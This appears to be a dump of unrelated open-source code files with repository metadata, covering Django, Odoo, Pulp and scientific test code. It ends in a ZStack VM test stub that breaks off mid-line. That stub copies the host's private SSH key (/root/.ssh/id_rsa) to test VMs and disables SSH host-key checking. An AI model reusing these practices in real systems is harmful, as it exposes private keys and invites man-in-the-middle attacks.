instance.bbox_y1]
instance.set_bounds_from_bbox(bbox)
def pre_delete_layer(instance, sender, **kwargs):
"""
Remove any associated style to the layer, if it is not used by other layers.
Default style will be deleted in post_delete_layer
"""
if instance.service:
return
logger.debug(
"Going to delete the styles associated for [%s]",
instance.typename.encode('utf-8'))
ct = ContentType.objects.get_for_model(instance)
OverallRating.objects.filter(
content_type=ct,
object_id=instance.id).delete()
default_style = instance.default_style
for style in instance.styles.all():
if style.layer_styles.all().count() == 1:
if style != default_style:
style.delete()
def post_delete_layer(instance, sender, **kwargs):
"""
Removed the layer from any associated map, if any.
Remove the layer default style.
"""
from geonode.maps.models import MapLayer
logger.debug(
"Going to delete associated maplayers for [%s]",
instance.typename.encode('utf-8'))
MapLayer.objects.filter(
name=instance.typename,
ows_url=instance.ows_url).delete()
if instance.service:
return
logger.debug(
"Going to delete the default style for [%s]",
instance.typename.encode('utf-8'))
if instance.default_style and Layer.objects.filter(
default_style__id=instance.default_style.id).count() == 0:
instance.default_style.delete()
signals.pre_save.connect(pre_save_layer, sender=Layer)
signals.post_save.connect(resourcebase_post_save, sender=Layer)
signals.pre_delete.connect(pre_delete_layer, sender=Layer)
signals.post_delete.connect(post_delete_layer, sender=Layer)
|
mishravikas/geonode-permissions
|
geonode/layers/models.py
|
Python
|
gpl-3.0
| 15,289 | 0.001243 |
import unittest
import scipy
from SloppyCell.ReactionNetworks import *
lorenz = Network('lorenz')
lorenz.add_compartment('basic')
lorenz.add_species('x', 'basic', 0.5)
lorenz.add_species('y', 'basic', 0.5)
lorenz.add_species('z', 'basic', 0.5)
lorenz.add_parameter('sigma', 1.0)
lorenz.add_parameter('r', 2.0)
lorenz.add_parameter('b', 2.0)
lorenz.add_rate_rule('x', 'sigma*(y-x)')
lorenz.add_rate_rule('y', 'r*x - y - x*z')
lorenz.add_rate_rule('z', 'x*y - b*z')
class test_fixedpoints(unittest.TestCase):
def test_basic(self):
""" Test basic fixed-point finding """
net = lorenz.copy('test')
fp = Dynamics.dyn_var_fixed_point(net, dv0=[1,1,1], with_logs=False)
# This should find the fixed-point [sqrt(2), sqrt(2), 1]
self.assertAlmostEqual(fp[0], scipy.sqrt(2), 6, 'Failed on basic 1,0.')
self.assertAlmostEqual(fp[1], scipy.sqrt(2), 6, 'Failed on basic 1,1.')
self.assertAlmostEqual(fp[2], 1, 6, 'Failed on basic 1,2.')
fp = Dynamics.dyn_var_fixed_point(net, dv0=[-0.1,-0.1,-0.1],
with_logs=False)
# This should find the fixed-point [0, 0, 0]
self.assertAlmostEqual(fp[0], 0, 6, 'Failed on basic 2,0.')
self.assertAlmostEqual(fp[1], 0, 6, 'Failed on basic 2,1.')
self.assertAlmostEqual(fp[2], 0, 6, 'Failed on basic 2,2.')
def test_withlogs(self):
""" Test fixed-point finding with logs """
net = lorenz.copy('test')
fp = Dynamics.dyn_var_fixed_point(net, dv0=[1,1,1], with_logs=True)
# This should find the fixed-point [sqrt(2), sqrt(2), 1]
self.assertAlmostEqual(fp[0], scipy.sqrt(2), 6, 'Failed on logs 1,0.')
self.assertAlmostEqual(fp[1], scipy.sqrt(2), 6, 'Failed on logs 1,1.')
self.assertAlmostEqual(fp[2], 1, 6, 'Failed on logs 1,2.')
fp = Dynamics.dyn_var_fixed_point(net, dv0=[0.1,0.1,0.1],
with_logs=True)
# This should find the fixed-point [0, 0, 0]
self.assertAlmostEqual(fp[0], 0, 6, 'Failed on logs 2,0.')
self.assertAlmostEqual(fp[1], 0, 6, 'Failed on logs 2,1.')
self.assertAlmostEqual(fp[2], 0, 6, 'Failed on logs 2,2.')
def test_stability(self):
net = lorenz.copy('test')
# The sqrt(b*(r-1)), sqrt(b*(r-1)), r-1 fixed point is stable for r < rH
# Strogatz, Nonlinear Dynamics and Chaos (p. 316)
fp, stable = Dynamics.dyn_var_fixed_point(net, dv0=[1,1,1],
stability=True)
self.assertEqual(stable, -1, 'Failed to classify stable fixed point')
# (0,0,0) is a saddle here
fp, stable = Dynamics.dyn_var_fixed_point(net, dv0=[0.01,0.01,0.01],
stability=True)
self.assertEqual(stable, 0, 'Failed to classify saddle')
# (0,0,0) is a stable node here
net.set_var_ic('r', 0.5)
fp, stable = Dynamics.dyn_var_fixed_point(net, dv0=[0.1,0.1,0.1],
stability=True)
self.assertEqual(stable, -1, 'Failed to classify stable fixed point')
# Now make the far fixed point a saddle...
net.set_var_ic('sigma', 6.0)
net.set_var_ic('r', 25)
fp, stable = Dynamics.dyn_var_fixed_point(net, dv0=[10,10,10],
stability=True)
self.assertEqual(stable, 0, 'Failed to classify saddle')
suite = unittest.makeSuite(test_fixedpoints)
if __name__ == '__main__':
unittest.main()
|
GutenkunstLab/SloppyCell
|
test/test_FixedPoints.py
|
Python
|
bsd-3-clause
| 3,610 | 0.006925 |
#this model represents a request in our system
from google.appengine.ext import ndb
from datetime import datetime
from datetime import timedelta
class Request(ndb.Model):
city = ndb.StringProperty()
phone = ndb.StringProperty()
date = ndb.DateTimeProperty()
description = ndb.StringProperty()
isCarNeeded = ndb.BooleanProperty()
@classmethod
def add(self,cit,phoneNum,desc,carNeeded):
req = Request()
req.city = cit
req.phone = phoneNum
req.description = desc
req.isCarNeeded = carNeeded
req.date = datetime.utcnow()
#converting UTC to GMT+2[Israel timezone]
#utc = datetime.utcnow()
#UTC_OFFSET = 3
#req.date = utc# - timedelta(hours=UTC_OFFSET) #(UTC+3 = GMT+2)
req.put()
|
chenbachar/HelpApp
|
src/versions/Iter2/helpapp-seproject/models/request.py
|
Python
|
mit
| 739 | 0.051421 |
from gettext import gettext as _
import traceback
from pulp.client.commands.repo.sync_publish import StatusRenderer
from pulp.client.extensions.core import COLOR_FAILURE
from pulp_puppet.common import constants
from pulp_puppet.common.publish_progress import PublishProgressReport
from pulp_puppet.common.sync_progress import SyncProgressReport
class PuppetStatusRenderer(StatusRenderer):
def __init__(self, context):
super(PuppetStatusRenderer, self).__init__(context)
# Sync Steps
self.sync_metadata_last_state = constants.STATE_NOT_STARTED
self.sync_modules_last_state = constants.STATE_NOT_STARTED
# Publish Steps
self.publish_modules_last_state = constants.STATE_NOT_STARTED
self.publish_metadata_last_state = constants.STATE_NOT_STARTED
self.publish_http_last_state = constants.STATE_NOT_STARTED
self.publish_https_last_state = constants.STATE_NOT_STARTED
# UI Widgets
self.sync_metadata_bar = self.prompt.create_progress_bar()
self.sync_modules_bar = self.prompt.create_progress_bar()
self.publish_modules_bar = self.prompt.create_progress_bar()
self.publish_metadata_spinner = self.prompt.create_spinner()
def display_report(self, progress_report):
# Sync Steps
if constants.IMPORTER_ID in progress_report:
sync_report = SyncProgressReport.from_progress_dict(progress_report[constants.IMPORTER_ID])
self._display_sync_metadata_step(sync_report)
self._display_sync_modules_step(sync_report)
# Publish Steps
if constants.DISTRIBUTOR_ID in progress_report:
publish_report = PublishProgressReport.from_progress_dict(progress_report[constants.DISTRIBUTOR_ID])
self._display_publish_modules_step(publish_report)
self._display_publish_metadata_step(publish_report)
self._display_publish_http_https_step(publish_report)
def _display_sync_metadata_step(self, sync_report):
# Do nothing if it hasn't started yet or has already finished
if sync_report.metadata_state == constants.STATE_NOT_STARTED or \
self.sync_metadata_last_state in constants.COMPLETE_STATES:
return
# Only render this on the first non-not-started state
if self.sync_metadata_last_state == constants.STATE_NOT_STARTED:
self.prompt.write(_('Downloading metadata...'), tag='download-metadata')
# Same behavior for running or success
if sync_report.metadata_state in (constants.STATE_RUNNING, constants.STATE_SUCCESS):
items_done = sync_report.metadata_query_finished_count
items_total = sync_report.metadata_query_total_count
item_type = _('Metadata Query')
self._render_itemized_in_progress_state(items_done, items_total,
item_type, self.sync_metadata_bar, sync_report.metadata_state)
# The only state left to handle is if it failed
else:
self.prompt.render_failure_message(_('... failed'))
self.prompt.render_spacer()
self._render_error(sync_report.metadata_error_message,
sync_report.metadata_exception,
sync_report.metadata_traceback)
# Before finishing update the state
self.sync_metadata_last_state = sync_report.metadata_state
def _display_sync_modules_step(self, sync_report):
# Do nothing if it hasn't started yet or has already finished
if sync_report.modules_state == constants.STATE_NOT_STARTED or \
self.sync_modules_last_state in constants.COMPLETE_STATES:
return
# Only render this on the first non-not-started state
if self.sync_modules_last_state == constants.STATE_NOT_STARTED:
self.prompt.write(_('Downloading new modules...'), tag='downloading')
# Same behavior for running or success
if sync_report.modules_state in (constants.STATE_RUNNING, constants.STATE_SUCCESS):
items_done = sync_report.modules_finished_count + sync_report.modules_error_count
items_total = sync_report.modules_total_count
item_type = _('Module')
self._render_itemized_in_progress_state(items_done, items_total, item_type,
self.sync_modules_bar, sync_report.modules_state)
# The only state left to handle is if it failed
else:
self.prompt.render_failure_message(_('... failed'))
self.prompt.render_spacer()
self._render_error(sync_report.modules_error_message,
sync_report.modules_exception,
sync_report.modules_traceback)
# Regardless of success or failure, display any individual module errors
# if the new state is complete
if sync_report.modules_state in constants.COMPLETE_STATES:
self._render_module_errors(sync_report.modules_individual_errors)
# Before finishing update the state
self.sync_modules_last_state = sync_report.modules_state
def _display_publish_modules_step(self, publish_report):
# Do nothing if it hasn't started yet or has already finished
if publish_report.modules_state == constants.STATE_NOT_STARTED or \
self.publish_modules_last_state in constants.COMPLETE_STATES:
return
# Only render this on the first non-not-started state
if self.publish_modules_last_state == constants.STATE_NOT_STARTED:
self.prompt.write(_('Publishing modules...'), tag='publishing')
# Same behavior for running or success
if publish_report.modules_state in (constants.STATE_RUNNING, constants.STATE_SUCCESS):
items_done = publish_report.modules_finished_count + publish_report.modules_error_count
items_total = publish_report.modules_total_count
item_type = _('Module')
self._render_itemized_in_progress_state(items_done, items_total, item_type,
self.publish_modules_bar, publish_report.modules_state)
# The only state left to handle is if it failed
else:
self.prompt.render_failure_message(_('... failed'))
self.prompt.render_spacer()
self._render_error(publish_report.modules_error_message,
publish_report.modules_exception,
publish_report.modules_traceback)
# Regardless of success or failure, display any individual module errors
# if the new state is complete
if publish_report.modules_state in constants.COMPLETE_STATES:
self._render_module_errors(publish_report.modules_individual_errors)
# Before finishing update the state
self.publish_modules_last_state = publish_report.modules_state
def _display_publish_metadata_step(self, publish_report):
# Do nothing if it hasn't started yet or has already finished
if publish_report.metadata_state == constants.STATE_NOT_STARTED or \
self.publish_metadata_last_state in constants.COMPLETE_STATES:
return
# Only render this on the first non-not-started state
if self.publish_metadata_last_state == constants.STATE_NOT_STARTED:
self.prompt.write(_('Generating repository metadata...'), tag='generating')
if publish_report.metadata_state == constants.STATE_RUNNING:
self.publish_metadata_spinner.next()
elif publish_report.metadata_state == constants.STATE_SUCCESS:
self.publish_metadata_spinner.next(finished=True)
self.prompt.write(_('... completed'), tag='completed')
self.prompt.render_spacer()
elif publish_report.metadata_state == constants.STATE_FAILED:
self.publish_metadata_spinner.next(finished=True)
self.prompt.render_failure_message(_('... failed'))
self.prompt.render_spacer()
self._render_error(publish_report.modules_error_message,
publish_report.modules_exception,
publish_report.modules_traceback)
self.publish_metadata_last_state = publish_report.metadata_state
def _display_publish_http_https_step(self, publish_report):
# -- HTTP --------
if publish_report.publish_http != constants.STATE_NOT_STARTED and \
self.publish_http_last_state not in constants.COMPLETE_STATES:
self.prompt.write(_('Publishing repository over HTTP...'))
if publish_report.publish_http == constants.STATE_SUCCESS:
self.prompt.write(_('... completed'), tag='http-completed')
elif publish_report.publish_http == constants.STATE_SKIPPED:
self.prompt.write(_('... skipped'), tag='http-skipped')
else:
self.prompt.write(_('... unknown'), tag='http-unknown')
self.publish_http_last_state = publish_report.publish_http
self.prompt.render_spacer()
# -- HTTPS --------
if publish_report.publish_https != constants.STATE_NOT_STARTED and \
self.publish_https_last_state not in constants.COMPLETE_STATES:
self.prompt.write(_('Publishing repository over HTTPS...'))
if publish_report.publish_https == constants.STATE_SUCCESS:
self.prompt.write(_('... completed'), tag='https-completed')
elif publish_report.publish_https == constants.STATE_SKIPPED:
self.prompt.write(_('... skipped'), tag='https-skipped')
else:
self.prompt.write(_('... unknown'), tag='https-unknown')
self.publish_https_last_state = publish_report.publish_https
def _render_itemized_in_progress_state(self, items_done, items_total, type_name,
progress_bar, current_state):
"""
This is a pretty ugly way of reusing similar code between the publish
steps for packages and distributions. There might be a cleaner way
but I was having trouble updating the correct state variable and frankly
I'm out of time. Feel free to fix this if you are inspired.
"""
# For the progress bar to work, we can't write anything after it until
# we're completely finished with it. Assemble the download summary into
# a string and let the progress bar render it.
message_data = {
'name' : type_name.title(),
'items_done' : items_done,
'items_total' : items_total,
}
template = _('%(name)s: %(items_done)s/%(items_total)s items')
bar_message = template % message_data
# If there's nothing to download in this step, flag the bar as complete
if items_total is 0:
items_total = items_done = 1
progress_bar.render(items_done, items_total, message=bar_message)
if current_state == constants.STATE_SUCCESS:
self.prompt.write(_('... completed'))
self.prompt.render_spacer()
def _render_module_errors(self, individual_errors):
"""
:param individual_errors: dictionary where keys are module names and
values are dicts with keys 'exception' and
'traceback'.
:type individual_errors: dict
"""
if individual_errors:
# TODO: read this from config
display_error_count = 20
self.prompt.render_failure_message(_('Could not import the following modules:'))
for module_error in individual_errors[:display_error_count]:
msg = _(' %(module)s: %(error)s')
msg = msg % {'module': module_error['module'], 'error': module_error['exception']}
self.prompt.write(msg, color=COLOR_FAILURE)
self.prompt.render_spacer()
def _render_error(self, error_message, exception, traceback):
msg = _('The following error was encountered during the previous '
'step. More information can be found by passing -v flag one or more times')
self.prompt.render_failure_message(msg)
self.prompt.render_spacer()
self.prompt.render_failure_message(' %s' % error_message)
self.context.logger.error(error_message)
self.context.logger.error(exception)
self.context.logger.error(traceback)
|
dkliban/pulp_puppet
|
pulp_puppet_extensions_admin/pulp_puppet/extensions/admin/repo/status.py
|
Python
|
gpl-2.0
| 12,614 | 0.002299 |
# -*- coding: utf-8 -*-
# Generated by Django 1.9.9 on 2016-08-04 12:17
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('communities', '0013_auto_20160801_1241'),
]
operations = [
migrations.AlterField(
model_name='groupuser',
name='group',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='group_users', to='communities.CommunityGroup', verbose_name='Group'),
),
]
|
yaniv14/OpenCommunity
|
src/communities/migrations/0014_auto_20160804_1517.py
|
Python
|
bsd-3-clause
| 603 | 0.001658 |
from croplands_api import api
from croplands_api.models import User
from croplands_api.views.api.processors import api_roles, remove_relations
from croplands_api.exceptions import Unauthorized
from croplands_api.auth import is_anonymous, current_user, verify_role
def can_edit_the_user(data=None, **kwargs):
"""
Determines if the current user can modify the specified user account.
:param data:
:param kwargs:
:return: None
"""
if is_anonymous():
raise Unauthorized()
if hasattr(current_user, 'id') and current_user.id == int(kwargs['instance_id']):
return
if verify_role('admin'):
return
raise Unauthorized()
def check_for_me(data=None, **kwargs):
"""
:param data:
:param kwargs:
:return: None
"""
if is_anonymous():
raise Unauthorized(description="Must send token.")
if kwargs['instance_id'] == 'me':
kwargs['instance_id'] = current_user.id
def ignore_read_only_fields(data=None, **kwargs):
"""
Removes the read only field from the data. Alternative could be to raise a 409 conflict.
:param data: json
:param kwargs:
:return: None
"""
read_only = ['password', 'attempts', 'email_verification_token', 'score', 'id', 'status']
for field in read_only:
if field in data:
del data[field]
# abort(409)
def create(app):
api.create_api(User,
app=app,
collection_name='users',
methods=['GET', 'PATCH'],
results_per_page=50,
preprocessors={
'GET_SINGLE': [check_for_me],
'PATCH_SINGLE': [can_edit_the_user, remove_relations,
ignore_read_only_fields],
'PATCH_MANY': [api_roles('admin'), remove_relations,
ignore_read_only_fields],
'DELETE': [api_roles('admin'), ]
},
postprocessors={
},
exclude_columns=['email', 'password', 'attempts',
'email_verification_token', 'status']
)
|
justinwp/croplands
|
croplands_api/views/api/users.py
|
Python
|
mit
| 2,237 | 0.002235 |
# -*- encoding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
#
# Copyright (c) 2011 Noviat nv/sa (www.noviat.be). All rights reserved.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import time
from openerp.osv import fields, osv
import openerp.addons.decimal_precision as dp
from openerp.tools.translate import _
from openerp.exceptions import UserError
class account_bank_statement(osv.osv):
_inherit = 'account.bank.statement'
def write(self, cr, uid, ids, vals, context=None):
if context is None:
context = {}
# bypass obsolete statement line resequencing
if vals.get('line_ids', False) or context.get('ebanking_import', False):
res = super(osv.osv, self).write(cr, uid, ids, vals, context=context)
else:
res = super(account_bank_statement, self).write(cr, uid, ids, vals, context=context)
return res
def button_confirm_bank(self, cr, uid, ids, context=None):
bank_statement_line_obj = self.pool.get('account.bank.statement.line')
super(account_bank_statement, self).button_confirm_bank(cr, uid, ids, context=context)
for st in self.browse(cr, uid, ids, context=context):
if st.line_ids:
line_ids = [l.id for l in st.line_ids]
cr.execute("UPDATE account_bank_statement_line \
SET state='confirm' WHERE id in %s ",
(tuple(line_ids),))
bank_statement_line_obj.invalidate_cache(cr, uid, ['state'], line_ids, context=context)
return True
def button_cancel(self, cr, uid, ids, context=None):
bank_statement_line_obj = self.pool.get('account.bank.statement.line')
super(account_bank_statement, self).button_cancel(cr, uid, ids, context=context)
for st in self.browse(cr, uid, ids, context=context):
if st.line_ids:
line_ids = [l.id for l in st.line_ids]
cr.execute("UPDATE account_bank_statement_line \
SET state='draft' WHERE id in %s ",
(tuple(line_ids),))
bank_statement_line_obj.invalidate_cache(cr, uid, ['state'], line_ids, context=context)
return True
class account_bank_statement_line_global(osv.osv):
_name = 'account.bank.statement.line.global'
_description = 'Batch Payment Info'
_columns = {
'name': fields.char('OBI', required=True, help="Originator to Beneficiary Information"),
'code': fields.char('Code', size=64, required=True),
'parent_id': fields.many2one('account.bank.statement.line.global', 'Parent Code', ondelete='cascade'),
'child_ids': fields.one2many('account.bank.statement.line.global', 'parent_id', 'Child Codes', copy=True),
'type': fields.selection([
('iso20022', 'ISO 20022'),
('coda', 'CODA'),
('manual', 'Manual'),
], 'Type', required=True),
'amount': fields.float('Amount', digits_compute=dp.get_precision('Account')),
'bank_statement_line_ids': fields.one2many('account.bank.statement.line', 'globalisation_id', 'Bank Statement Lines'),
}
_rec_name = 'code'
_defaults = {
'code': lambda s,c,u,ctx={}: s.pool.get('ir.sequence').next_by_code(c, u, 'account.bank.statement.line.global'),
'name': '/',
}
_sql_constraints = [
('code_uniq', 'unique (code)', 'The code must be unique !'),
]
def name_search(self, cr, user, name, args=None, operator='ilike', context=None, limit=100):
if not args:
args = []
ids = []
if name:
ids = self.search(cr, user, [('code', 'ilike', name)] + args, limit=limit)
if not ids:
ids = self.search(cr, user, [('name', operator, name)] + args, limit=limit)
if not ids and len(name.split()) >= 2:
#Separating code and name for searching
operand1, operand2 = name.split(' ', 1) #name can contain spaces
ids = self.search(cr, user, [('code', 'like', operand1), ('name', operator, operand2)] + args, limit=limit)
else:
ids = self.search(cr, user, args, context=context, limit=limit)
return self.name_get(cr, user, ids, context=context)
class account_bank_statement_line(osv.osv):
_inherit = 'account.bank.statement.line'
_columns = {
'val_date': fields.date('Value Date', states={'confirm': [('readonly', True)]}),
'globalisation_id': fields.many2one('account.bank.statement.line.global', 'Globalisation ID',
states={'confirm': [('readonly', True)]},
help="Code to identify transactions belonging to the same globalisation level within a batch payment"),
'globalisation_amount': fields.related('globalisation_id', 'amount', type='float',
relation='account.bank.statement.line.global', string='Glob. Amount', readonly=True),
'state': fields.selection([('draft', 'Draft'), ('confirm', 'Confirmed')],
'Status', required=True, readonly=True, copy=False),
'counterparty_name': fields.char('Counterparty Name', size=35),
'counterparty_bic': fields.char('Counterparty BIC', size=11),
'counterparty_number': fields.char('Counterparty Number', size=34),
'counterparty_currency': fields.char('Counterparty Currency', size=3),
}
_defaults = {
'state': 'draft',
}
def unlink(self, cr, uid, ids, context=None):
if context is None:
context = {}
if context.get('block_statement_line_delete', False):
raise UserError(_('Delete operation not allowed. Please go to the associated bank statement in order to delete and/or modify bank statement line.'))
return super(account_bank_statement_line, self).unlink(cr, uid, ids, context=context)
|
addition-it-solutions/project-all
|
addons/account_bank_statement_extensions/account_bank_statement.py
|
Python
|
agpl-3.0
| 6,685 | 0.005984 |
DEBUG = True
SQLALCHEMY_DATABASE_URI = 'sqlite:////tmp/test.db'
|
xperienced/flask-rest-boilerplate
|
config/development.py
|
Python
|
mit
| 63 | 0.015873 |
from django.template import Library, Node, Variable, VariableDoesNotExist
from django.core.urlresolvers import reverse
from job_board.views import job_list_by_tag
register = Library()
def do_populate_tags(parser,token):
"""
render a list of tags, with it's link.
the token is tag.
Arguments:
- `parser`:
- `token`:
"""
bits = token.split_contents()
print bits
return PopulateTagsNode(bits[1])
class PopulateTagsNode(Node):
def __init__(self,tag):
self.tag_tag = Variable(tag)
def render(self,context):
try:
_tag = self.tag_tag.resolve(context)
_font_size = _tag.font_size + 10
_font_weight = min(900,(300 + (_tag.font_size*100)))
_url = reverse(job_list_by_tag, kwargs = {'tag_name' : _tag.name } )
return "<span style='font-size:%spx;font-weight:%s'><a href='%s'>%s</a></span>" % (_font_size,_font_weight,_url,_tag.name)
except VariableDoesNotExist:
return ''
register.tag('populate_tag', do_populate_tags)
|
jpartogi/django-job-board
|
job_board/templatetags/tag_list.py
|
Python
|
bsd-3-clause
| 1,058 | 0.017013 |
# -*- coding: utf-8 -*-
# Copyright 2016 KMEE
# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl).
{
'name': 'L10n Br Resource',
'summary': """
This module extend core resource to create important brazilian
informations. Define a Brazilian calendar and some tools to compute
dates used in financial and payroll modules""",
'version': '8.0.1.0.0',
'license': 'AGPL-3',
'author': 'KMEE,Odoo Community Association (OCA)',
'website': 'www.odoobrasil.org.br',
'depends': [
'l10n_br_base',
'resource',
],
'external_dependencies': {
'python': ['pybrasil'],
},
'data': [
'views/resource_calendar.xml',
'views/resource_calendar_leaves.xml',
'views/menu_resource_calendar.xml',
'wizard/workalendar_holiday_import.xml',
],
}
|
kmee/odoo-brazil-hr
|
l10n_br_resource/__openerp__.py
|
Python
|
agpl-3.0
| 854 | 0 |
'''
Create an unified test_stub to share test operations
@author: Youyk
'''
import os
import subprocess
import time
import uuid
import zstacklib.utils.ssh as ssh
import zstacklib.utils.jsonobject as jsonobject
import zstackwoodpecker.test_lib as test_lib
import zstackwoodpecker.test_util as test_util
import zstackwoodpecker.zstack_test.zstack_test_vm as zstack_vm_header
import zstackwoodpecker.zstack_test.zstack_test_volume as zstack_volume_header
import zstackwoodpecker.zstack_test.zstack_test_eip as zstack_eip_header
import zstackwoodpecker.zstack_test.zstack_test_vip as zstack_vip_header
import zstackwoodpecker.operations.resource_operations as res_ops
import zstackwoodpecker.operations.vm_operations as vm_ops
test_file = '/tmp/test.img'
TEST_TIME = 120
def check_icmp_connection_to_public_ip(vm1, pub_ip='223.5.5.5', expected_result='PASS'):
vm1_inv = vm1.get_vm()
if expected_result is 'PASS':
test_lib.lib_check_ping(vm1_inv, pub_ip)
elif expected_result is 'FAIL':
with test_lib.expected_failure("ping from vm1 to public ", Exception):
test_lib.lib_check_ping(vm1_inv, pub_ip)
else:
test_util.test_fail('The expected result should either PASS or FAIL')
def create_vlan_vm_with_volume(l3_name=None, disk_offering_uuids=None, disk_number=None, session_uuid = None):
if not disk_offering_uuids:
disk_offering = test_lib.lib_get_disk_offering_by_name(os.environ.get('smallDiskOfferingName'))
disk_offering_uuids = [disk_offering.uuid]
if disk_number:
for i in range(disk_number - 1):
disk_offering_uuids.append(disk_offering.uuid)
return create_vlan_vm(l3_name, disk_offering_uuids, \
session_uuid = session_uuid)
def create_vlan_vm(l3_name=None, disk_offering_uuids=None, system_tags=None, session_uuid = None, instance_offering_uuid = None):
image_name = os.environ.get('imageName_net')
if not l3_name:
l3_name = os.environ.get('l3VlanNetworkName1')
return create_vm('vlan_vm', image_name, l3_name, \
disk_offering_uuids=disk_offering_uuids, system_tags=system_tags, \
instance_offering_uuid = instance_offering_uuid,
session_uuid = session_uuid)
def create_vm(vm_name='virt-vm', \
image_name = None, \
l3_name = None, \
instance_offering_uuid = None, \
host_uuid = None, \
disk_offering_uuids=None, system_tags=None, rootVolumeSystemTags=None, session_uuid = None):
if not image_name:
image_name = os.environ.get('imageName_net')
if not l3_name:
l3_name = os.environ.get('l3PublicNetworkName')
vm_creation_option = test_util.VmOption()
image_uuid = test_lib.lib_get_image_by_name(image_name).uuid
l3_names = l3_name.split(',')
print 'shuang: %s' % (l3_names)
l3_net_uuids = []
for l3_n in l3_names:
l3_net_uuid = test_lib.lib_get_l3_by_name(l3_n).uuid
l3_net_uuids.append(l3_net_uuid)
if not instance_offering_uuid:
instance_offering_name = os.environ.get('instanceOfferingName_s')
instance_offering_uuid = test_lib.lib_get_instance_offering_by_name(instance_offering_name).uuid
vm_creation_option.set_l3_uuids(l3_net_uuids)
vm_creation_option.set_image_uuid(image_uuid)
vm_creation_option.set_instance_offering_uuid(instance_offering_uuid)
vm_creation_option.set_name(vm_name)
vm_creation_option.set_system_tags(system_tags)
vm_creation_option.set_data_disk_uuids(disk_offering_uuids)
if rootVolumeSystemTags:
vm_creation_option.set_rootVolume_systemTags(rootVolumeSystemTags)
if host_uuid:
vm_creation_option.set_host_uuid(host_uuid)
vm = zstack_vm_header.ZstackTestVm()
vm.set_creation_option(vm_creation_option)
vm.create()
return vm
def create_volume(volume_creation_option=None, session_uuid = None):
if not volume_creation_option:
disk_offering = test_lib.lib_get_disk_offering_by_name(os.environ.get('smallDiskOfferingName'))
volume_creation_option = test_util.VolumeOption()
volume_creation_option.set_disk_offering_uuid(disk_offering.uuid)
volume_creation_option.set_name('vr_test_volume')
volume_creation_option.set_session_uuid(session_uuid)
volume = zstack_volume_header.ZstackTestVolume()
volume.set_creation_option(volume_creation_option)
volume.create()
return volume
def make_ssh_no_password(vm_inv):
vm_ip = vm_inv.vmNics[0].ip
ssh.make_ssh_no_password(vm_ip, test_lib.lib_get_vm_username(vm_inv), \
test_lib.lib_get_vm_password(vm_inv))
def execute_shell_in_process(cmd, timeout=10, logfd=None):
if not logfd:
process = subprocess.Popen(cmd, executable='/bin/sh', shell=True, universal_newlines=True)
else:
process = subprocess.Popen(cmd, executable='/bin/sh', shell=True, stdout=logfd, stderr=logfd, universal_newlines=True)
start_time = time.time()
while process.poll() is None:
curr_time = time.time()
TEST_TIME = curr_time - start_time
if TEST_TIME > timeout:
process.kill()
test_util.test_logger('[shell:] %s timeout ' % cmd)
return False
time.sleep(1)
test_util.test_logger('[shell:] %s is finished.' % cmd)
return process.returncode
def create_test_file(vm_inv, bandwidth):
'''
the bandwidth is for calculate the test file size,
since the test time should be finished in 60s.
bandwidth unit is KB.
'''
vm_ip = vm_inv.vmNics[0].ip
file_size = bandwidth * TEST_TIME
seek_size = file_size / 1024 - 1
timeout = 10
ssh_cmd = 'ssh -oStrictHostKeyChecking=no -oCheckHostIP=no -oUserKnownHostsFile=/dev/null %s' % vm_ip
cmd = '%s "dd if=/dev/zero of=%s bs=1M count=1 seek=%d"' \
% (ssh_cmd, test_file, seek_size)
if execute_shell_in_process(cmd, timeout) != 0:
test_util.test_fail('test file is not created')
def copy_key_file(vm_inv):
vm_ip = vm_inv.vmNics[0].ip
cmd = 'scp -oStrictHostKeyChecking=no -oCheckHostIP=no -oUserKnownHostsFile=/dev/null /root/.ssh/id_rsa %s:/root/.ssh/id_rsa' % vm_ip
timeout = 10
if execute_shell_in_process(cmd, timeout) != 0:
test_util.test_fail('test file is not created')
def copy_pub_key_file(vm_inv):
vm_ip = vm_inv.vmNics[0].ip
cmd = 'scp -oStrictHostKeyChecking=no -oCheckHostIP=no -oUserKnownHostsFile=/dev/null /root/.ssh/id_rsa.pub %s:/root/.ssh/id_rsa.pub' % vm_ip
timeout = 10
if execute_shell_in_process(cmd, timeout) != 0:
test_util.test_fail('test pub key file is not created')
def test_scp_vm_outbound_speed(vm_inv, bandwidth, raise_exception = True):
'''
bandwidth unit is KB
'''
timeout = TEST_TIME + 30
vm_ip = vm_inv.vmNics[0].ip
cmd = 'scp -oStrictHostKeyChecking=no -oCheckHostIP=no -oUserKnownHostsFile=/dev/null %s:%s /dev/null' \
% (vm_ip, test_file)
start_time = time.time()
if execute_shell_in_process(cmd, timeout) != 0:
test_util.test_fail('scp test file failed')
end_time = time.time()
scp_time = end_time - start_time
if scp_time < TEST_TIME:
if not raise_exception:
test_util.test_logger('network outbound QOS test file failed, since the scp time: %d is smaller than the expected test time: %d. It means the bandwidth limitation: %d KB/s is not effect. ' % (scp_time, TEST_TIME, bandwidth))
return False
test_util.test_fail('network outbound QOS test file failed, since the scp time: %d is smaller than the expected test time: %d. It means the bandwidth limitation: %d KB/s is not effect. ' % (scp_time, TEST_TIME, bandwidth))
else:
test_util.test_logger('network outbound QOS test file pass, since the scp time: %d is bigger than the expected test time: %d. It means the bandwidth limitation: %d KB/s is effect. ' % (scp_time, TEST_TIME, bandwidth))
return True
def test_scp_vm_inbound_speed(vm_inv, bandwidth, raise_exception = True):
'''
bandwidth unit is KB
'''
timeout = TEST_TIME + 30
vm_ip = vm_inv.vmNics[0].ip
file_size = bandwidth * TEST_TIME
seek_size = file_size / 1024 - 1
cmd = 'dd if=/dev/zero of=%s bs=1M count=1 seek=%d' \
% (test_file, seek_size)
os.system(cmd)
cmd = 'scp -oStrictHostKeyChecking=no -oCheckHostIP=no -oUserKnownHostsFile=/dev/null %s %s:/dev/null' \
